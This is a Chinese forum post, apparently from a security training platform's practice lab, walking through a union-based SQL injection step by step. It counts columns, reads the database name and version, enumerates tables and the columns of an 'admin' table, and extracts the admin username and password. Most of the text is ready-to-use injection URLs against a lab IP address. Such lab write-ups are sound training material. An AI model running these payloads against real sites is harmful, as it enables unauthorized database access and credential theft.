公开课靶场 第一章 SQL注入

qop1114   ·   发表于 17天前   ·   问题反馈求助区

sql注入初级测试

0x01 发现目标

发现sql注入点

  1. http://59.63.200.79:8003/?id=1
  2. http://59.63.200.79:8003/?id=1%20and%201=1

%20 为url编码 空格

  1. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%201
  2. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%202
  3. //页面显示错误
  4. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%203

判断回显字段

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,2

0x02 构造sql语句

1.查询当前数据库名

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,database()

2.查询数据库版本

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,version()

3.查询当前数据库 表名

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

4.查询表列信息

limit 0,1, 从你的表中的第0个数据开始,只读取一个;

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%200,1
  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%201,1
  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%202,1


查出 admin 表里 有 id username password 三个字段

5.构造语句查询用户

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,username%20from%20admin%20%20limit%200,1

发现仅有一个用户

查出用户密码

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,password%20from%20admin%20%20limit%200,1

打赏我,让我更有动力~

0 Reply   |  Until 17天前 | 281 View
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3